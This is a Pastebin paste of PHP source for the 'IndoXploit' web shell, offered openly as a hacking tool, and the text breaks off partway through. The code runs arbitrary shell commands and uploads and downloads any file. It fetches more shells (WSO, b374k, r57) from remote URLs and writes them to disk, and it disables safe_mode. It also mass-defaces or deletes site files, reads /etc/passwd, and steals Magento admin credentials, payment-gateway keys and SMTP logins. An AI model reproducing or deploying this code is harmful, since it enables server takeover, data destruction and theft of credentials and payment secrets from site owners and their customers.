SHARE
TWEET

IndoXploit Shell Recoded [wJump Gator[OldBug]]

ToKeiChun Jan 19th, 2018 (edited) 249 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @error_log(0);
  5. @ini_set('error_log',NULL);
  6. @ini_set('log_errors',0);
  7. @ini_set('max_execution_time',0);
  8. @ini_set('output_buffering',0);
  9. @ini_set('display_errors', 0);
  10. @set_time_limit(0);
  11. @set_magic_quotes_runtime(0);
  12. $lol="7153bac2333cc7d601f17f9b3889d284";
  13. function printLogin() {
  14.     ?>
  15. <form enctype="multipart/form-data"action=""
  16. method="post"> <input name="action" type="file" /><br>
  17. <input type="submit" value="upload" />
  18. <br>
  19. <br>
  20. <br>
  21. <br>
  22. <br>
  23. <br>
  24. <br>
  25. <br>
  26. <br>
  27. <br>
  28. <br>
  29. <br>
  30. <br>
  31. <br>
  32. <br>
  33. <br>
  34. <br>
  35. <br>
  36. <br>
  37. <br>
  38. <br>
  39. <br>
  40. <br>
  41. <br>
  42. <br>
  43. <br>
  44. <br>
  45. <br>
  46. <br>
  47. <br>
  48. <br>
  49. <br>
  50. <br>
  51. <br>
  52. </form><form method=post>
  53.     <input type=password name=janchonx>
  54.     </form></center>
  55.     <?php
  56.    
  57.     exit;
  58. }
  59. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  60.     if( empty( $lol ) ||
  61.         ( isset( $_POST['janchonx'] ) && ( md5($_POST['janchonx']) == $lol ) ) )
  62.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  63.     else
  64.         printLogin();
  65. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  66.     @ob_clean();
  67.     $file = $_GET['file'];
  68.     header('Content-Description: File Transfer');
  69.     header('Content-Type: application/octet-stream');
  70.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  71.     header('Expires: 0');
  72.     header('Cache-Control: must-revalidate');
  73.     header('Pragma: public');
  74.     header('Content-Length: ' . filesize($file));
  75.     readfile($file);
  76.     exit;
  77. }  
  78.    
  79. ?>
  80. <html>
  81. <head>
  82. <title>Hacked by Mr.ToKeiChun69</title>
  83. <link href='https://s3-eu-west-1.amazonaws.com/201310-blog/01_vim_java.jpg' rel='icon' type='image/x-icon'/>
  84. <meta name='author' content='Mr.ToKeiChun69'>
  85. <meta charset="UTF-8">
  86. <style type='text/css'>
  87. @import url(https://fonts.googleapis.com/css?family=Abel);
  88. html {
  89.     background: #000000;
  90.     color: #ffffff;
  91.     font-family: 'Abel';
  92.     font-size: 13px;
  93.     width: 100%;
  94. }
  95. li {
  96.     display: inline;
  97.     margin: 5px;
  98.     padding: 5px;
  99. }
  100. table, th, td {
  101.     border-collapse:collapse;
  102.     font-family: Tahoma, Geneva, sans-serif;
  103.     background: transparent;
  104.     font-family: 'Abel';
  105.     font-size: 13px;
  106. }
  107. .table_home, .th_home, .td_home {
  108.     border: 1px solid #ffffff;
  109. }
  110. th {
  111.     padding: 10px;
  112. }
  113. a {
  114.     color: #ffffff;
  115.     text-decoration: none;
  116. }
  117. a:hover {
  118.     color: gold;
  119.     text-decoration: underline;
  120. }
  121. b {
  122.     color: gold;
  123. }
  124. input[type=text], input[type=password],input[type=submit] {
  125.     background: transparent;
  126.     color: #ffffff;
  127.     border: 1px solid #ffffff;
  128.     margin: 5px auto;
  129.     padding-left: 5px;
  130.     font-family: 'Abel';
  131.     font-size: 13px;
  132. }
  133. textarea {
  134.     border: 1px solid #ffffff;
  135.     width: 100%;
  136.     height: 400px;
  137.     padding-left: 5px;
  138.     margin: 10px auto;
  139.     resize: none;
  140.     background: transparent;
  141.     color: #ffffff;
  142.     font-family: 'Abel';
  143.     font-size: 13px;
  144. }
  145. select {
  146.     background: transparent;
  147.     color: #ffffff;
  148.     border: 1px solid #ffffff;
  149.     margin: 5px auto;
  150.     padding-left: 5px;
  151.     font-family: 'Abel';
  152.     font-size: 13px;
  153. }
  154. .but {
  155.     background: transparent;
  156.     color: #ffffff;
  157.     border: 1px solid #ffffff;
  158.     margin: 5px auto;
  159.     padding-left: 5px;
  160.     font-family: 'Abel';
  161.     font-size: 13px;
  162. }
  163. </style>
  164. </head>
  165. <?php
  166. if (file_exists("php.ini")){
  167. }else{
  168. $img = fopen('php.ini', 'w');
  169. $sec = "safe_mode = OFF
  170. disable_funtions = NONE";
  171. fwrite($img ,$sec);
  172. fclose($img);}     
  173. function w($dir,$perm) {
  174.     if(!is_writable($dir)) {
  175.         return "<font color=red>".$perm."</font>";
  176.     } else {
  177.         return "<font color=lime>".$perm."</font>";
  178.     }
  179. }
  180.     function UrlLoop($url,$type){
  181.  
  182.         $urlArray = array();
  183.  
  184.         $ch = curl_init();
  185.         curl_setopt($ch, CURLOPT_URL, $url);
  186.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  187.         $result = curl_exec($ch);
  188.  
  189.         $regex='|<a.*?href="(.*?)"|';
  190.         preg_match_all($regex,$result,$parts);
  191.         $links=$parts[1];
  192.         foreach($links as $link){
  193.             array_push($urlArray, $link);
  194.         }
  195.         curl_close($ch);
  196.  
  197.         foreach($urlArray as $value){
  198.             $lol="$url$value";
  199.             if(preg_match("#$type#is", $lol)) {
  200.                 echo "$lol\r\n";
  201.             }
  202.         }
  203.     }
  204. function exe($cmd) {    
  205. if(function_exists('system')) {        
  206.         @ob_start();       
  207.         @system($cmd);     
  208.         $buff = @ob_get_contents();        
  209.         @ob_end_clean();       
  210.         return $buff;  
  211.     } elseif(function_exists('exec')) {        
  212.         @exec($cmd,$results);      
  213.         $buff = "";        
  214.         foreach($results as $result) {         
  215.             $buff .= $result;      
  216.         } return $buff;    
  217.     } elseif(function_exists('passthru')) {        
  218.         @ob_start();       
  219.         @passthru($cmd);       
  220.         $buff = @ob_get_contents();        
  221.         @ob_end_clean();       
  222.         return $buff;  
  223.     } elseif(function_exists('shell_exec')) {      
  224.         $buff = @shell_exec($cmd);     
  225.         return $buff;  
  226.     }
  227. }
  228. function perms($file){
  229. $perms = fileperms($file);
  230. if (($perms & 0xC000) == 0xC000) {
  231. $info = 's';
  232. } elseif (($perms & 0xA000) == 0xA000) {
  233. $info = 'l';
  234. } elseif (($perms & 0x8000) == 0x8000) {
  235. $info = '-';
  236. } elseif (($perms & 0x6000) == 0x6000) {
  237. $info = 'b';
  238. } elseif (($perms & 0x4000) == 0x4000) {
  239. $info = 'd';
  240. } elseif (($perms & 0x2000) == 0x2000) {
  241. $info = 'c';
  242. } elseif (($perms & 0x1000) == 0x1000) {
  243. $info = 'p';
  244. } else {
  245. $info = 'u';
  246. }
  247. $info .= (($perms & 0x0100) ? 'r' : '-');
  248. $info .= (($perms & 0x0080) ? 'w' : '-');
  249. $info .= (($perms & 0x0040) ?
  250. (($perms & 0x0800) ? 's' : 'x' ) :
  251. (($perms & 0x0800) ? 'S' : '-'));
  252. $info .= (($perms & 0x0020) ? 'r' : '-');
  253. $info .= (($perms & 0x0010) ? 'w' : '-');
  254. $info .= (($perms & 0x0008) ?
  255. (($perms & 0x0400) ? 's' : 'x' ) :
  256. (($perms & 0x0400) ? 'S' : '-'));
  257. $info .= (($perms & 0x0004) ? 'r' : '-');
  258. $info .= (($perms & 0x0002) ? 'w' : '-');
  259. $info .= (($perms & 0x0001) ?
  260. (($perms & 0x0200) ? 't' : 'x' ) :
  261. (($perms & 0x0200) ? 'T' : '-'));
  262. return $info;
  263. }
  264. function hdd($s) {
  265. if($s >= 1073741824)
  266. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  267. elseif($s >= 1048576)
  268. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  269. elseif($s >= 1024)
  270. return sprintf('%1.2f',$s / 1024 ) .' KB';
  271. else
  272. return $s .' B';
  273. }
  274. function ambilKata($param, $kata1, $kata2){
  275.     if(strpos($param, $kata1) === FALSE) return FALSE;
  276.     if(strpos($param, $kata2) === FALSE) return FALSE;
  277.     $start = strpos($param, $kata1) + strlen($kata1);
  278.     $end = strpos($param, $kata2, $start);
  279.     $return = substr($param, $start, $end - $start);
  280.     return $return;
  281. }
  282. if(get_magic_quotes_gpc()) {
  283.     function idx_ss($array) {
  284.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  285.     }
  286.     $_POST = idx_ss($_POST);
  287. }
  288. function CreateTools($names,$lokasi){
  289.     if ( $_GET['create'] == $names ){
  290.         $a= "".$_SERVER['SERVER_NAME']."";
  291. $b= dirname($_SERVER['PHP_SELF']);
  292. $c = "/chonx_tools/".$names.".php";
  293. if (file_exists('chonx_tools/'.$names.'.php')){
  294.     echo '<script type="text/javascript">alert("Done");window.location.href = "chonx_tools/'.$names.'.php";</script> ';
  295.     }
  296.     else {mkdir("chonx_tools", 0777);
  297. file_put_contents('chonx_tools/'.$names.'.php', file_get_contents($lokasi));
  298. echo ' <script type="text/javascript">alert("Done");window.location.href = "chonx_tools/'.$names.'.php";</script> ';}}}
  299.  
  300. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  301. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  302. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  303. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  304. CreateTools("MailerDelay","https://pastebin.com/raw/7LRvRwNm");
  305. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  306. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  307. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  308. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  309. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  310. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  311. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  312. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
  313. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
  314. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
  315. if(isset($_GET['dir'])) {
  316.     $dir = $_GET['dir'];
  317.     chdir($_GET['dir']);
  318. } else {
  319.     $dir = getcwd();
  320. }
  321. $dir = str_replace("\\","/",$dir);
  322. $scdir = explode("/", $dir);
  323. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  324. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  325. $ds = @ini_get("disable_functions");
  326. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  327. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  328. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  329. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  330. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  331. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  332. if(!function_exists('posix_getegid')) {
  333.     $user = @get_current_user();
  334.     $uid = @getmyuid();
  335.     $gid = @getmygid();
  336.     $group = "?";
  337. } else {
  338.     $uid = @posix_getpwuid(posix_geteuid());
  339.     $gid = @posix_getgrgid(posix_getegid());
  340.     $user = $uid['name'];
  341.     $uid = $uid['uid'];
  342.     $group = $gid['name'];
  343.     $gid = $gid['gid'];
  344. }
  345. $d0mains = @file("/etc/named.conf");
  346.             $users=@file('/etc/passwd');
  347.         if($d0mains)
  348.         {
  349.             $count;  
  350.             foreach($d0mains as $d0main)
  351.             {
  352.                 if(@ereg("zone",$d0main))
  353.                 {
  354.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
  355.                     flush();
  356.                     if(strlen(trim($domains[1][0])) > 2)
  357.                     {
  358.                         flush();
  359.                         $count++;
  360.                     }
  361.                 }
  362.             }
  363.         }
  364.  
  365. $sport=$_SERVER['SERVER_PORT'];
  366. echo "<table style='width:100%'>";
  367. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
  368. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  369. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  370. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  371. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
  372. echo "<tr><td>Port :<font color=lime>  $sport</font> </td></tr>";
  373. echo "<tr><td>Safe Mode: $sm</td></tr>";
  374. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  375.  
  376. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  377. echo "<tr><td>Current DIR: ";
  378. foreach($scdir as $c_dir => $cdir) {   
  379.     echo "<a href='?dir=";
  380.     for($i = 0; $i <= $c_dir; $i++) {
  381.         echo $scdir[$i];
  382.         if($i != $c_dir) {
  383.         echo "/";
  384.         }
  385.     }
  386.     echo "'>$cdir</a>/";
  387. }
  388. echo "<tr><td><form method='post' action='?dir=$dir&do=cmd'>
  389.     Command :
  390.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  391.     </form></td></tr>";
  392. echo "</table><hr>";
  393. echo "<center>";
  394. echo "<ul>";
  395. echo "<li>[ <a href='?'>Home</a> ]</li>";
  396. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  397. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  398. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  399. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  400. echo "<li>[ <a href='?dir=$dir&do=symconfig'>Config 2</a> ]</li>";
  401. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  402. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
  403. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  404. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  405. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  406. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  407. echo "<li>[ <a href='?dir=$dir&do=defacerid'>Defacer.ID</a> ]</li>";
  408. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
  409. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  410. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  411. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  412. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  413. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  414. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  415. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</a> ]</li>";
  416. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li>";
  417. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypass etc/passw</a> ]<br></li>";
  418. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  419. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
  420. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  421. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  422. echo "<li>[ <a href='?dir=$dir&do=injectcode'>Code Inject</a> ]</li>";
  423. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  424. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
  425. echo "<li>[ <a href='?dir=$dir&do=metu'>LogOut</a> ]<br></li>";
  426. echo "</ul>";
  427. echo "</center>";
  428. echo "<hr>";
  429. if($_GET['do'] == 'upload') {
  430.     echo "<center>";
  431.     if($_POST['upload']) {
  432.         if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  433.             $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  434.         } else {
  435.             $act = "<font color=red>failed to upload file</font>";
  436.         }
  437.     }
  438.     echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  439.     echo $act;
  440.     echo "</center>";
  441. }
  442.  elseif($_GET['do'] == 'cmd') {
  443.     if($_POST['do_cmd']) {
  444.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  445.     }
  446. } elseif($_GET['do'] == 'mass_deface') {
  447.     echo "<center><form action=\"\" method=\"post\">\n";
  448.     $dirr=$_POST['d_dir'];
  449.     $index = $_POST["script"];
  450.     $index = str_replace('"',"'",$index);
  451.     $index = stripslashes($index);
  452.     function edit_file($file,$index){
  453.         if (is_writable($file)) {
  454.         clear_fill($file,$index);
  455.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  456.         }
  457.         else {
  458.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  459.             }
  460.             }
  461.     function hapus_massal($dir,$namafile) {
  462.         if(is_writable($dir)) {
  463.             $dira = scandir($dir);
  464.             foreach($dira as $dirb) {
  465.                 $dirc = "$dir/$dirb";
  466.                 $lokasi = $dirc.'/'.$namafile;
  467.                 if($dirb === '.') {
  468.                     if(file_exists("$dir/$namafile")) {
  469.                         unlink("$dir/$namafile");
  470.                     }
  471.                 } elseif($dirb === '..') {
  472.                     if(file_exists("".dirname($dir)."/$namafile")) {
  473.                         unlink("".dirname($dir)."/$namafile");
  474.                     }
  475.                 } else {
  476.                     if(is_dir($dirc)) {
  477.                         if(is_writable($dirc)) {
  478.                             if(file_exists($lokasi)) {
  479.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  480.                                 unlink($lokasi);
  481.                                 $idx = hapus_massal($dirc,$namafile);
  482.                             }
  483.                         }
  484.                     }
  485.                 }
  486.             }
  487.         }
  488.     }
  489.     function clear_fill($file,$index){
  490.         if(file_exists($file)){
  491.             $handle = fopen($file,'w');
  492.             fwrite($handle,'');
  493.             fwrite($handle,$index);
  494.             fclose($handle);  } }
  495.  
  496.     function gass(){
  497.         global $dirr , $index ;
  498.         chdir($dirr);
  499.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  500.         $files = scandir($dirr) ;
  501.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  502.         sort($files);
  503.         $n = 0 ;
  504.         foreach ($files as $file){
  505.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  506.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  507.                 edit_file($file,$index);
  508.                 flush();
  509.                 $n = $n +1 ;
  510.                 }
  511.                 }
  512.                 echo "<br>";
  513.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  514.                     }
  515.     function ListFiles($dirrall) {
  516.  
  517.     if($dh = opendir($dirrall)) {
  518.  
  519.        $files = Array();
  520.        $inner_files = Array();
  521.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  522.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  523.         while($file = readdir($dh)) {
  524.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  525.                 if(is_dir($dirrall . "/" . $file)) {
  526.                     $inner_files = ListFiles($dirrall . "/" . $file);
  527.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  528.                 } else {
  529.                     array_push($files, $dirrall . "/" . $file);
  530.                 }
  531.             }
  532.             }
  533.  
  534.             closedir($dh);
  535.             return $files;
  536.         }
  537.     }
  538.     function gass_all(){
  539.         global $index ;
  540.         $dirrall=$_POST['d_dir'];
  541.         foreach (ListFiles($dirrall) as $key=>$file){
  542.             $file = str_replace('//',"/",$file);
  543.             echo "<center><strong>$file</strong> ===>";
  544.             edit_file($file,$index);
  545.             flush();
  546.         }
  547.         $key = $key+1;
  548.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  549.     function sabun_massal($dir,$namafile,$isi_script) {
  550.         if(is_writable($dir)) {
  551.             $dira = scandir($dir);
  552.             foreach($dira as $dirb) {
  553.                 $dirc = "$dir/$dirb";
  554.                 $lokasi = $dirc.'/'.$namafile;
  555.                 if($dirb === '.') {
  556.                     file_put_contents($lokasi, $isi_script);
  557.                 } elseif($dirb === '..') {
  558.                     file_put_contents($lokasi, $isi_script);
  559.                 } else {
  560.                     if(is_dir($dirc)) {
  561.                         if(is_writable($dirc)) {
  562.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  563.                             file_put_contents($lokasi, $isi_script);
  564.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  565.                         }
  566.                     }
  567.                 }
  568.             }
  569.         }
  570.     }
  571.     if($_POST['mass'] == 'onedir') {
  572.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  573.         $ini="http://";
  574.         $mainpath=$_POST[d_dir];
  575.         $file=$_POST[d_file];
  576.         $dir=opendir("$mainpath");
  577.         $code=base64_encode($_POST[script]);
  578.         $indx=base64_decode($code);
  579.         while($row=readdir($dir)){
  580.         $start=@fopen("$row/$file","w+");
  581.         $finish=@fwrite($start,$indx);
  582.         if ($finish){
  583.             echo"$ini$row/$file\n";
  584.             }
  585.         }
  586.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  587.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  588.         $dir=opendir("$mainpath");
  589.         $code=base64_encode($_POST[script]);
  590.         $indx=base64_decode($code);
  591.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  592.         $finish=@fwrite($start,$indx);
  593.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  594.         }
  595.  
  596.     }
  597.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  598.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  599.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  600.     elseif($_POST['mass'] == 'massdeface') {
  601.         echo "<div style='margin: 5px auto; padding: 5px'>";
  602.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  603.         echo "</div>";  }
  604.     else {
  605.         echo "
  606.         <center><font style='text-decoration: underline;'>
  607.         Select Type:<br>
  608.         </font>
  609.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  610.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  611.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  612.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  613.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  614.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  615.         <font style='text-decoration: underline;'>Folder:</font><br>
  616.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  617.         <font style='text-decoration: underline;'>Filename:</font><br>
  618.         <input type='text' name='d_file' value='readthis.txt' style='width: 450px;' height='10'><br>
  619.         <font style='text-decoration: underline;'>Index File:</font><br>
  620.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Mr.ToKeiChun69</textarea><br>
  621.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  622.         </form></center>";
  623.         }
  624.     }
  625. elseif($_GET['do'] == 'magen') {
  626. echo'
  627. <div id="page-wrap">  
  628. <center>  
  629. <br>  
  630. <FORM action=""  method="post">  
  631. <div align="center">[M A G E N T O] - Stealing Information<br>  
  632. <div align="center">coder: sohai & n4KuLa_<br>  
  633. <input type="hidden" name="form_action" value="2">  
  634. </div>  
  635. </div>  
  636. ';  
  637.  
  638.  
  639. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){  
  640.     $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');  
  641.     if(isset($xml->global->resources->default_setup->connection)) {  
  642.        $connection = $xml->global->resources->default_setup->connection;  
  643.        $prefix = $xml->global->resources->db->table_prefix;  
  644.        $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1  
  645.        require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';  
  646.          
  647.        try {  
  648.            $app = Mage::app('default');  
  649.            Mage::getSingleton('core/session', array('name'=>'frontend'));  
  650.        }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}  
  651.  
  652.        if (!mysql_connect($connection->host, $connection->username, $connection->password)){  
  653.            print("Could not connect: " . mysql_error());  
  654.        }  
  655.        mysql_select_db($connection->dbname);  
  656.        echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";  
  657.  
  658.     $crypto = new Varien_Crypt_Mcrypt();  
  659.     $crypto->init($key);  
  660.  
  661.     //=========================================================================================================  
  662.     $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");  
  663.     if (!$query){  
  664.           echo "<center><b>Gagal</b></center>";  
  665.     }else{  
  666.             $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));  
  667.           echo'<br><br>  
  668.                 ====================================================================<br>  
  669.                                 [ Admin FROM website : '.$site['website'].'] <br>  
  670.                 ====================================================================<br>';  
  671.     }  
  672.     echo "  
  673.     <table border='1' align='center' >  
  674.     <tr>  
  675.     <td>id</td>  
  676.     <td>firstname</td>  
  677.     <td>lastname</td>  
  678.     <td>email</td>  
  679.     <td>username</td>  
  680.     <td>password</td>  
  681.     </tr>";  
  682.         while($vx = mysql_fetch_array($query)) {  
  683.         $no = 1;  
  684.         $user_id = $vx['user_id'];  
  685.         $username = $vx['username'];  
  686.         $password = $vx['password'];  
  687.         $email = $vx['email'];  
  688.         $firstname = $vx['firstname'];  
  689.         $lastname = $vx['lastname'];  
  690.         echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";  
  691.         }  
  692.     echo "</table><br>";  
  693.     //=========================================================================================================  
  694.     $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where  path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");  
  695.     if(mysql_num_rows($query) != 0){  
  696.         if (!$query){  
  697.               echo "<center><b>Gagal</b></center>";  
  698.         }else{  
  699.               echo'<br><br>  
  700.                     ====================================================================<br>  
  701.                                     [ Authorizenet ] <br>  
  702.                     ====================================================================<br>';  
  703.         }  
  704.         echo "  
  705.         <table border='1' align='center' >  
  706.         <tr>  
  707.         <td>no</td>  
  708.         <td>user</td>  
  709.         <td>pass</td>      
  710.         </tr>";  
  711.             $no = 1;  
  712.             while($vx = mysql_fetch_array($query)) {  
  713.             $user = $crypto->decrypt($vx['user']);  
  714.             $pass = $crypto->decrypt($vx['pass']);  
  715.  
  716.              
  717.             echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
  718.             $no++;  
  719.             }  
  720.         echo "</table><br>";  
  721.     }  
  722.     //=========================================================================================================  
  723.     $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");  
  724.     if(mysql_num_rows($query_smtp) != 0){  
  725.         if (!$query_smtp){  
  726.               echo "<center><b>Gagal</b></center>";  
  727.         }else{  
  728.               echo'<br><br>  
  729.                     ====================================================================<br>  
  730.                                     [ SMTP ] <br>  
  731.                     ====================================================================<br>';  
  732.         }  
  733.         echo "  
  734.         <table border='1' align='center' >  
  735.         <tr>  
  736.         <td>no</td>  
  737.         <td>host</td>          
  738.         <td>port</td>  
  739.         <td>user</td>  
